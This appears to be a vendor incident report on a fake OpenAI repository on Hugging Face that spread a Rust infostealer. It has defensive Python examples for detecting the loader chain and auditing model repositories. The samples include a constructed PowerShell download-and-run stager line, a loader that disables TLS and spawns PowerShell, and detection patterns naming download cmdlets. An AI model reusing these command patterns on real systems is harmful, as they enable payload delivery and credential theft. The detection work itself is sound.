Executive Summary
In May 2026, a malicious repository named 'Open-OSS/privacy-filter' was discovered on Hugging Face, impersonating OpenAI's legitimate 'Privacy Filter' project. This repository contained a 'loader.py' script that, when executed, downloaded and ran a Rust-based infostealer malware on Windows systems. The malware targeted sensitive data, including browser credentials, cryptocurrency wallets, and system information. The repository reached the top of Hugging Face's trending list with over 244,000 downloads before being removed.
This incident underscores the growing trend of supply chain attacks targeting AI and machine learning platforms. As these platforms become integral to various industries, ensuring the integrity of shared repositories is paramount to prevent the distribution of malicious code.
Why This Matters Now
The increasing reliance on AI and machine learning platforms has made them attractive targets for cybercriminals. This incident highlights the urgent need for enhanced security measures and vigilance when utilizing shared repositories to prevent the infiltration of malicious code into trusted environments.
Attack Path Analysis
Attackers created a malicious repository on Hugging Face, impersonating OpenAI's 'Privacy Filter' project, to distribute infostealer malware. When the bundled loader script was executed, it disabled SSL certificate verification, then fetched and executed a PowerShell command that downloaded a batch file; the batch file performed privilege escalation and downloaded the final payload. The Rust-based infostealer then exfiltrated sensitive data, including browser data, Discord tokens, cryptocurrency wallets, and system information, to a command-and-control server.
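The chain described above leaves a recognisable process tree on the endpoint: a Python interpreter spawning PowerShell with a download cmdlet, PowerShell launching a batch file from a temporary directory, and a later child running with higher privileges than its parent. The following is an added detection example written for this page, not code from any of the sources or from the products named below. The telemetry is constructed (Sysmon-style process-creation records, simplified to pid, ppid, image, cmdline and user, which are assumed field names), and the scoring rules and threshold are assumptions a defender would tune to their own environment.

```python
"""Score constructed process-creation telemetry for the python -> PowerShell
-> batch -> privileged payload chain. Added example; field names, sample
events and weights are assumptions, not captured data."""
import re

# Constructed sample events (hypothetical, not from the incident). The first
# five form the suspicious chain; the last two are benign developer noise.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe", "user": "alice"},
    {"pid": 200, "ppid": 100, "image": "python.exe", "cmdline": "python.exe loader.py", "user": "alice"},
    {"pid": 201, "ppid": 200, "image": "powershell.exe", "user": "alice",
     "cmdline": 'powershell.exe -NoProfile -w hidden -c "iwr http://example.invalid/x.bat '
                '-OutFile $env:TEMP\\x.bat; & $env:TEMP\\x.bat"'},
    {"pid": 202, "ppid": 201, "image": "cmd.exe", "user": "alice",
     "cmdline": "cmd.exe /c C:\\Users\\alice\\AppData\\Local\\Temp\\x.bat"},
    {"pid": 203, "ppid": 202, "image": "stealer.exe", "user": "SYSTEM",
     "cmdline": "C:\\Users\\alice\\AppData\\Local\\Temp\\stealer.exe"},
    {"pid": 300, "ppid": 100, "image": "python.exe", "cmdline": "python.exe -m pytest", "user": "bob"},
    {"pid": 301, "ppid": 300, "image": "git.exe", "cmdline": "git.exe status", "user": "bob"},
]

# Command-line markers for a PowerShell stager (assumed patterns).
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I)


def build_index(events):
    return {e["pid"]: e for e in events}


def ancestry(by_pid, pid):
    """Images from the given process up to the root, nearest first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def score_event(e, by_pid):
    """Apply the chain rules to one event; returns (score, reasons)."""
    reasons = []
    img, cmd = e["image"].lower(), e["cmdline"].lower()
    lineage = ancestry(by_pid, e["ppid"])      # parents only
    parent = by_pid.get(e["ppid"])
    if img == "powershell.exe":
        if "python.exe" in lineage:
            reasons.append(("powershell spawned beneath a python process", 3))
        if DOWNLOAD_RE.search(cmd):
            reasons.append(("download cmdlet on the powershell command line", 2))
        if HIDDEN_RE.search(cmd):
            reasons.append(("hidden window or encoded command", 1))
    if img == "cmd.exe" and ".bat" in cmd and "\\temp\\" in cmd and "powershell.exe" in lineage:
        reasons.append(("batch file in Temp launched from powershell", 3))
    if (parent is not None and e["user"].upper() == "SYSTEM"
            and parent["user"].upper() != "SYSTEM" and "python.exe" in lineage):
        reasons.append(("privilege jump to SYSTEM inside a user-launched script chain", 3))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def detect(events, threshold=3):
    """Return alert records for every event scoring at or above the threshold."""
    by_pid = build_index(events)
    alerts = []
    for e in events:
        score, reasons = score_event(e, by_pid)
        if score >= threshold:
            alerts.append({"pid": e["pid"], "image": e["image"], "score": score,
                           "reasons": reasons,
                           "chain": " -> ".join(reversed(ancestry(by_pid, e["pid"])))})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"pid {a['pid']} score {a['score']}: {a['chain']}")
        for r in a["reasons"]:
            print("   -", r)
```

Each rule scores the relationship between a process and its ancestors rather than a single command line, so the developer running pytest from Python is never flagged while the three stages of the stager chain each produce an alert with the full parent chain attached for the analyst.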
Kill Chain Progression
Initial Compromise
Description
Attackers created a malicious repository on Hugging Face, impersonating OpenAI's 'Privacy Filter' project to distribute infostealer malware.
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Supply Chain
Phishing: Spearphishing Attachment
Command and Scripting Interpreter: PowerShell
Abuse Elevation Control Mechanism: Bypass User Account Control
Obfuscated Files or Information
Screen Capture
Data from Local System
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure software integrity
Control ID: 6.3.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Supply Chain Risk Management
Control ID: 3.1
NIS2 Directive – Security of Supply Chains
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Supply chain attacks targeting AI repositories expose development teams to infostealers compromising source code, credentials, and intellectual property through malicious packages.
Information Technology/IT
Fake OpenAI repositories deliver Rust-based infostealers targeting browser data, SSH credentials, and system information, requiring comprehensive egress filtering and anomaly detection.
Capital Markets/Hedge Fund/Private Equity
Cryptocurrency wallet targeting malware exfiltrates trading credentials and digital assets, necessitating zero trust segmentation and encrypted traffic controls for financial operations.
Higher Education/Academia
Academic researchers downloading AI models face credential theft and system compromise, requiring enhanced visibility controls and secure hybrid connectivity for research infrastructure.
Sources
- Fake OpenAI repository on Hugging Face pushes infostealer malware (https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/)
- Malware Found in Trending Hugging Face Repository 'Open-OSS/privacy-filter' (https://www.hiddenlayer.com/insight/malware-found-in-trending-hugging-face-repository-open-oss-privacy-filter)
- The AI Supply Chain Threat: Malicious Models in Public Repositories (https://www.aisecurityfoundation.org/insights/malicious-models-supply-chain/)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could likely limit the attacker's ability to escalate privileges, move laterally, and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The CNSF may not directly prevent the initial compromise via a malicious repository, as this involves user interaction and external sources.
Control: Zero Trust Segmentation
Mitigation: Zero Trust Segmentation could likely limit the malware's ability to exploit elevated privileges by restricting access to sensitive resources.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security would likely limit the potential for lateral movement by monitoring and controlling internal traffic.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could likely detect and limit unauthorized outbound connections to command-and-control servers.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement would likely limit unauthorized data exfiltration by controlling outbound data flows.
The implementation of CNSF controls would likely reduce the scope of data exfiltration, thereby limiting potential financial loss and identity theft.
Impact at a Glance
Affected Business Functions
- Software Development
- Data Science
- Machine Learning Operations
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive credentials, including browser data, Discord tokens, cryptocurrency wallets, SSH, FTP, and VPN credentials.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict access and limit the spread of malware within the network.
- Utilize Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- Deploy Inline IPS (Suricata) to detect and block known exploit patterns and malicious payloads.
- Enhance Threat Detection & Anomaly Response capabilities to identify and respond to suspicious activities promptly.
- Regularly audit and verify the integrity of third-party repositories and software to prevent supply chain attacks.
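The last recommendation is the one a development or ML team can act on directly: a model repository is expected to hold weights, configuration and documentation, so a Python loader that disables TLS verification, downloads content at runtime and spawns a Windows shell is exactly the content an audit should surface before anyone runs it. The following is an added example written for this page, not code from any of the sources above; the allowlist of expected file types, the rule set and the constructed sample repository (including the inert, elided loader used as test input) are all assumptions.

```python
"""Pre-execution audit of a downloaded model repository. Added example: it
flags executable content and the risk patterns the report names (TLS
verification disabled, runtime downloads, spawning a Windows shell). The
allowlist, rules and sample files are assumptions."""
import ast
import posixpath

# Assumed allowlist of what a weights/config repository is expected to hold.
EXPECTED_SUFFIXES = {".safetensors", ".bin", ".json", ".md", ".txt", ".model"}
SPAWN_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen", "os.startfile"}
DOWNLOAD_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                  "requests.get", "requests.post", "httpx.get"}
SHELL_MARKERS = ("powershell", "cmd.exe", ".bat", ".ps1", ".exe")

# Constructed sample repository contents (hypothetical, not the incident's files).
BENIGN_UTIL = '''
import json

def load_config(path):
    with open(path) as f:
        return json.load(f)
'''

SUSPICIOUS_LOADER = '''
import ssl, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
stage = urllib.request.urlopen("https://example.invalid/stage").read()
subprocess.run(["powershell", "-NoProfile", "-Command", "<elided>"])
'''

SAMPLE_REPO = {
    "config.json": '{"model_type": "example"}',
    "model.safetensors": "",                       # binary placeholder, never parsed
    "README.md": "# privacy filter (constructed sample)",
    "utils.py": BENIGN_UTIL,
    "loader.py": SUSPICIOUS_LOADER,
}


def audit_listing(files):
    """Paths whose suffix is not expected in a model repository."""
    return sorted(p for p in files
                  if posixpath.splitext(p)[1].lower() not in EXPECTED_SUFFIXES)


def audit_source(src):
    """Static checks on one Python file; returns a list of finding strings."""
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return ["unparseable python source"]
    calls, attrs, strings, verify_false = set(), set(), [], False
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            calls.add(ast.unparse(node.func))
            verify_false |= any(k.arg == "verify" and isinstance(k.value, ast.Constant)
                                and k.value.value is False for k in node.keywords)
        elif isinstance(node, ast.Attribute):
            attrs.add(ast.unparse(node))          # catches assignments like ssl.* overrides
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.append(node.value.lower())
    findings = []
    if verify_false or attrs & {"ssl._create_unverified_context", "ssl.CERT_NONE"}:
        findings.append("TLS verification disabled")
    if calls & DOWNLOAD_CALLS:
        findings.append("downloads content at runtime")
    if calls & SPAWN_CALLS:
        findings.append("spawns an external process")
    if any(m in s for s in strings for m in SHELL_MARKERS):
        findings.append("references a Windows shell or executable")
    if "base64.b64decode" in calls and calls & ({"exec", "eval"} | SPAWN_CALLS):
        findings.append("decodes data and then executes it")
    return findings


def audit_repo(files):
    """files: {path: text}. Returns {path: [findings]} for anything worth review."""
    report = {p: ["unexpected file type for a model repository"] for p in audit_listing(files)}
    for path, text in files.items():
        if path.lower().endswith(".py"):
            report.setdefault(path, []).extend(audit_source(text))
    return {p: f for p, f in report.items() if f}


if __name__ == "__main__":
    for path, findings in audit_repo(SAMPLE_REPO).items():
        print(path)
        for f in findings:
            print("   -", f)
```

The listing check alone is what separates this case from a routine model download: a weights repository that ships any `.py` file deserves a review, and the AST rules then say what that file would do. Running the audit in a pipeline step before `loader.py` is ever invoked turns the "verify the integrity of third-party repositories" recommendation into a gate rather than a reminder.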